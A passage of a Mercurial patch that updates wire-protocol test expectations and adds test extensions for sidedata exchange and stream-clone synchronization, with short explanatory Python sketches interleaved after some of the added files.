equired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKsnirequired\xf5Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
(redirect target target-bad-tls requires SNI, which is unsupported)
sending capabilities command
s> setsockopt(6, 1, 1) -> None (?)
@@ -1055,9 +1059,9 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-cbor\r\n
- s> Content-Length: 2301\r\n
+ s> Content-Length: 2282\r\n
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKtlsversions\x82B42B39Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKtlsversions\x82B42B39Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
(remote redirect target target-bad-tls requires unsupported TLS versions: 39, 42)
sending capabilities command
s> setsockopt(6, 1, 1) -> None (?)
--- a/tests/test-wireproto-exchangev2-shallow.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-wireproto-exchangev2-shallow.t Tue Apr 20 11:01:06 2021 -0400
@@ -176,6 +176,10 @@
updating the branch cache
(sent 5 HTTP requests and * bytes; received * bytes in responses) (glob)
+#if chg
+ $ hg --kill-chg-daemon
+ $ sleep 2
+#endif
$ sqlite3 -line client-shallow-1/.hg/store/db.sqlite << EOF
> SELECT id, path, revnum, node, p1rev, p2rev, linkrev, flags FROM filedata ORDER BY id ASC;
> EOF
@@ -347,6 +351,10 @@
updating the branch cache
(sent 5 HTTP requests and * bytes; received * bytes in responses) (glob)
+#if chg
+ $ hg --kill-chg-daemon
+ $ sleep 2
+#endif
$ sqlite3 -line client-shallow-narrow-1/.hg/store/db.sqlite << EOF
> SELECT id, path, revnum, node, p1rev, p2rev, linkrev, flags FROM filedata ORDER BY id ASC;
> EOF
--- a/tests/test-wireproto-exchangev2.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-wireproto-exchangev2.t Tue Apr 20 11:01:06 2021 -0400
@@ -1099,7 +1099,8 @@
$ cat clone-output | grep "received frame"
received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos)
received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation)
- received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation)
+ received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (no-zstd !)
+ received frame(size=1283; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (zstd !)
received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos)
received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos)
received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation)
@@ -1196,7 +1197,8 @@
$ cat clone-output | grep "received frame"
received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos)
received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation)
- received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation)
+ received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (no-zstd !)
+ received frame(size=1283; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (zstd !)
received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos)
received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos)
received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation)
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/testlib/common.sh Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,7 @@
+mkcommit() {
+ name="$1"
+ shift
+ echo "$name" > "$name"
+ hg add "$name"
+ hg ci -m "$name" "$@"
+}
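For reference, a rough Python translation of the new mkcommit() shell helper above; it is purely illustrative (not part of the patch) and assumes `hg` is on PATH, the working directory is inside a repository, and Python 3.5+ for subprocess.run:

```python
# Illustrative equivalent of tests/testlib/common.sh mkcommit().
import subprocess

def mkcommit(name, *extra_args):
    # The shell helper echoes the name into a file of the same name.
    with open(name, "w") as f:
        f.write(name + "\n")
    # Track the file and commit it, forwarding extra arguments to `hg ci`.
    subprocess.run(["hg", "add", name], check=True)
    subprocess.run(["hg", "ci", "-m", name, *extra_args], check=True)
```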
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/testlib/ext-sidedata-2.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,50 @@
+# coding: utf8
+# ext-sidedata-2.py - small extension to test (differently) the sidedata logic
+#
+# Simulates a client for a complex sidedata exchange.
+#
+# Copyright 2021 Raphaël Gomès <rgomes@octobus.net>
+#
+# This software may be used and distributed according to the terms of the
+# GNU General Public License version 2 or any later version.
+
+from __future__ import absolute_import
+
+import hashlib
+import struct
+
+from mercurial.revlogutils import sidedata as sidedatamod
+
+
+def compute_sidedata_1(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text))
+ return sidedata
+
+
+def compute_sidedata_2(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sha256 = hashlib.sha256(text).digest()
+ sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256)
+ return sidedata
+
+
+def reposetup(ui, repo):
+ # Sidedata keys happen to be the same as the categories, which makes testing easier.
+ for kind in (b'changelog', b'manifest', b'filelog'):
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST1,
+ (sidedatamod.SD_TEST1,),
+ compute_sidedata_1,
+ )
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST2,
+ (sidedatamod.SD_TEST2,),
+ compute_sidedata_2,
+ )
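The two computers above store their payloads with fixed struct formats: a big-endian u32 for the text length and a fixed 32-byte field for the sha256 digest. A tiny standalone sketch of that round-trip (no Mercurial imports; the sample text is arbitrary):

```python
# Round-trip of the encodings used by compute_sidedata_1/2 above.
import hashlib
import struct

text = b"some revision text"

packed_len = struct.pack('>I', len(text))                       # SD_TEST1
packed_sha = struct.pack('>32s', hashlib.sha256(text).digest()) # SD_TEST2

assert struct.unpack('>I', packed_len)[0] == len(text)
assert struct.unpack('>32s', packed_sha)[0] == hashlib.sha256(text).digest()
```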
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/testlib/ext-sidedata-3.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,88 @@
+# coding: utf8
+# ext-sidedata-3.py - small extension to test (differently still) the sidedata
+# logic
+#
+# Simulates a client for a complex sidedata exchange.
+#
+# Copyright 2021 Raphaël Gomès <rgomes@octobus.net>
+#
+# This software may be used and distributed according to the terms of the
+# GNU General Public License version 2 or any later version.
+
+from __future__ import absolute_import
+
+import hashlib
+import struct
+
+from mercurial import (
+ extensions,
+ revlog,
+)
+
+from mercurial.revlogutils import sidedata as sidedatamod
+
+
+def compute_sidedata_1(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text))
+ return sidedata
+
+
+def compute_sidedata_2(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sha256 = hashlib.sha256(text).digest()
+ sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256)
+ return sidedata
+
+
+def compute_sidedata_3(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sha384 = hashlib.sha384(text).digest()
+ sidedata[sidedatamod.SD_TEST3] = struct.pack('>48s', sha384)
+ return sidedata
+
+
+def wrapaddrevision(
+ orig, self, text, transaction, link, p1, p2, *args, **kwargs
+):
+ if kwargs.get('sidedata') is None:
+ kwargs['sidedata'] = {}
+ sd = kwargs['sidedata']
+ sd = compute_sidedata_1(None, self, None, sd, text=text)
+ kwargs['sidedata'] = compute_sidedata_2(None, self, None, sd, text=text)
+ return orig(self, text, transaction, link, p1, p2, *args, **kwargs)
+
+
+def extsetup(ui):
+ extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision)
+
+
+def reposetup(ui, repo):
+ # Sidedata keys happen to be the same as the categories, which makes testing easier.
+ for kind in (b'changelog', b'manifest', b'filelog'):
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST1,
+ (sidedatamod.SD_TEST1,),
+ compute_sidedata_1,
+ )
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST2,
+ (sidedatamod.SD_TEST2,),
+ compute_sidedata_2,
+ )
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST3,
+ (sidedatamod.SD_TEST3,),
+ compute_sidedata_3,
+ )
+ repo.register_wanted_sidedata(sidedatamod.SD_TEST1)
+ repo.register_wanted_sidedata(sidedatamod.SD_TEST2)
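wrapaddrevision() above relies on extensions.wrapfunction(), which hands the original callable to the wrapper as its first argument. A plain-Python sketch of that composition pattern, with illustrative names (this is not the mercurial.extensions implementation):

```python
# Minimal stand-in for the wrapfunction() pattern used by wrapaddrevision():
# the wrapper receives the original function first, adjusts kwargs, then
# delegates to it.
def wrapfunction(container, name, wrapper):
    orig = getattr(container, name)
    def bound(*args, **kwargs):
        return wrapper(orig, *args, **kwargs)
    setattr(container, name, bound)

class Revlog:
    def addrevision(self, text, sidedata=None):
        return (text, sidedata or {})

def wrapaddrevision(orig, self, text, **kwargs):
    kwargs.setdefault('sidedata', {})
    kwargs['sidedata']['length'] = len(text)  # inject computed sidedata
    return orig(self, text, **kwargs)

wrapfunction(Revlog, 'addrevision', wrapaddrevision)
print(Revlog().addrevision(b'abc'))  # (b'abc', {'length': 3})
```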
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/testlib/ext-sidedata-4.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,19 @@
+# coding: utf8
+# ext-sidedata-4.py - small extension to test (differently still) the sidedata
+# logic
+#
+# Simulates a server for a complex sidedata exchange.
+#
+# Copyright 2021 Raphaël Gomès <rgomes@octobus.net>
+#
+# This software may be used and distributed according to the terms of the
+# GNU General Public License version 2 or any later version.
+
+from __future__ import absolute_import
+
+from mercurial.revlogutils import sidedata
+
+
+def reposetup(ui, repo):
+ repo.register_wanted_sidedata(sidedata.SD_TEST2)
+ repo.register_wanted_sidedata(sidedata.SD_TEST3)
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/testlib/ext-sidedata-5.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,81 @@
+# coding: utf8
+# ext-sidedata-5.py - small extension to test (differently still) the sidedata
+# logic
+#
+# Simulates a server for a simple sidedata exchange.
+#
+# Copyright 2021 Raphaël Gomès <rgomes@octobus.net>
+#
+# This software may be used and distributed according to the terms of the
+# GNU General Public License version 2 or any later version.
+
+from __future__ import absolute_import
+
+import hashlib
+import struct
+
+from mercurial import (
+ extensions,
+ revlog,
+)
+
+
+from mercurial.revlogutils import sidedata as sidedatamod
+
+
+def compute_sidedata_1(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text))
+ return sidedata
+
+
+def compute_sidedata_2(repo, revlog, rev, sidedata, text=None):
+ sidedata = sidedata.copy()
+ if text is None:
+ text = revlog.revision(rev)
+ sha256 = hashlib.sha256(text).digest()
+ sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256)
+ return sidedata
+
+
+def reposetup(ui, repo):
+ # Sidedata keys happen to be the same as the categories, which makes testing easier.
+ for kind in (b'changelog', b'manifest', b'filelog'):
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST1,
+ (sidedatamod.SD_TEST1,),
+ compute_sidedata_1,
+ )
+ repo.register_sidedata_computer(
+ kind,
+ sidedatamod.SD_TEST2,
+ (sidedatamod.SD_TEST2,),
+ compute_sidedata_2,
+ )
+
+ # Also declare the sidedata categories this repo wants to receive during
+ # exchange.
+ repo.register_wanted_sidedata(sidedatamod.SD_TEST1)
+ repo.register_wanted_sidedata(sidedatamod.SD_TEST2)
+
+
+def wrapaddrevision(
+ orig, self, text, transaction, link, p1, p2, *args, **kwargs
+):
+ if kwargs.get('sidedata') is None:
+ kwargs['sidedata'] = {}
+ sd = kwargs['sidedata']
+ ## let's store some arbitrary data just for testing
+ # text length
+ sd[sidedatamod.SD_TEST1] = struct.pack('>I', len(text))
+ # and sha2 hashes
+ sha256 = hashlib.sha256(text).digest()
+ sd[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256)
+ return orig(self, text, transaction, link, p1, p2, *args, **kwargs)
+
+
+def extsetup(ui):
+ extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision)
--- a/tests/testlib/ext-sidedata.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/testlib/ext-sidedata.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# ext-sidedata.py - small extension to test the sidedata logic
#
-# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net)
+# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -40,19 +40,21 @@
return orig(self, text, transaction, link, p1, p2, *args, **kwargs)
-def wraprevision(orig, self, nodeorrev, *args, **kwargs):
- text = orig(self, nodeorrev, *args, **kwargs)
+def wrap_revisiondata(orig, self, nodeorrev, *args, **kwargs):
+ text, sd = orig(self, nodeorrev, *args, **kwargs)
if getattr(self, 'sidedatanocheck', False):
- return text
+ return text, sd
+ if self.version & 0xFFFF != 2:
+ return text, sd
if nodeorrev != nullrev and nodeorrev != nullid:
- sd = self.sidedata(nodeorrev)
- if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]:
+ cat1 = sd.get(sidedata.SD_TEST1)
+ if cat1 is not None and len(text) != struct.unpack('>I', cat1)[0]:
raise RuntimeError('text size mismatch')
- expected = sd[sidedata.SD_TEST2]
+ expected = sd.get(sidedata.SD_TEST2)
got = hashlib.sha256(text).digest()
- if got != expected:
+ if expected is not None and got != expected:
raise RuntimeError('sha256 mismatch')
- return text
+ return text, sd
def wrapgetsidedatacompanion(orig, srcrepo, dstrepo):
@@ -81,7 +83,14 @@
def extsetup(ui):
extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision)
- extensions.wrapfunction(revlog.revlog, 'revision', wraprevision)
+ extensions.wrapfunction(revlog.revlog, '_revisiondata', wrap_revisiondata)
extensions.wrapfunction(
upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion
)
+
+
+def reposetup(ui, repo):
+ # We don't register sidedata computers because we don't care within these
+ # tests
+ repo.register_wanted_sidedata(sidedata.SD_TEST1)
+ repo.register_wanted_sidedata(sidedata.SD_TEST2)
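The reworked hook now reads both categories from the sidedata mapping returned by _revisiondata and tolerates missing keys instead of failing on them. A standalone sketch of the same consistency checks, using stand-in constants and hypothetical data:

```python
# Standalone version of the checks in wrap_revisiondata(): verify the
# stored length and sha256 against the revision text, skipping any
# category absent from the sidedata mapping.
import hashlib
import struct

SD_TEST1, SD_TEST2 = 1, 2  # stand-ins for the real category constants

def check(text, sd):
    cat1 = sd.get(SD_TEST1)
    if cat1 is not None and len(text) != struct.unpack('>I', cat1)[0]:
        raise RuntimeError('text size mismatch')
    expected = sd.get(SD_TEST2)
    if expected is not None and hashlib.sha256(text).digest() != expected:
        raise RuntimeError('sha256 mismatch')

text = b'payload'
check(text, {SD_TEST1: struct.pack('>I', len(text))})  # passes; SD_TEST2 absent
```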
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/testlib/ext-stream-clone-steps.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,31 @@
+from __future__ import absolute_import
+
+from mercurial import (
+ encoding,
+ extensions,
+ streamclone,
+ testing,
+)
+
+
+WALKED_FILE_1 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_1']
+WALKED_FILE_2 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_2']
+
+
+def _test_sync_point_walk_1(orig, repo):
+ testing.write_file(WALKED_FILE_1)
+
+
+def _test_sync_point_walk_2(orig, repo):
+ assert repo._currentlock(repo._lockref) is None
+ testing.wait_file(WALKED_FILE_2)
+
+
+def uisetup(ui):
+ extensions.wrapfunction(
+ streamclone, '_test_sync_point_walk_1', _test_sync_point_walk_1
+ )
+
+ extensions.wrapfunction(
+ streamclone, '_test_sync_point_walk_2', _test_sync_point_walk_2
+ )
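The two wrapped hooks coordinate the stream clone with the test harness through marker files named by the HG_TEST_STREAM_WALKED_FILE_* environment variables. A minimal sketch of that write/wait handshake in plain Python; the polling loop is an assumption about the behavior of testing.write_file/wait_file, not their actual implementation:

```python
# File-based synchronization sketch: one process signals by creating a
# marker file, the other blocks until that file appears. Illustrative only.
import os
import time

def write_file(path):
    with open(path, 'wb'):
        pass  # an empty marker file is enough to signal

def wait_file(path, timeout=10.0):
    deadline = time.time() + timeout
    while not os.path.exists(path):
        if time.time() > deadline:
            raise RuntimeError('sync point %r never appeared' % path)
        time.sleep(0.01)
```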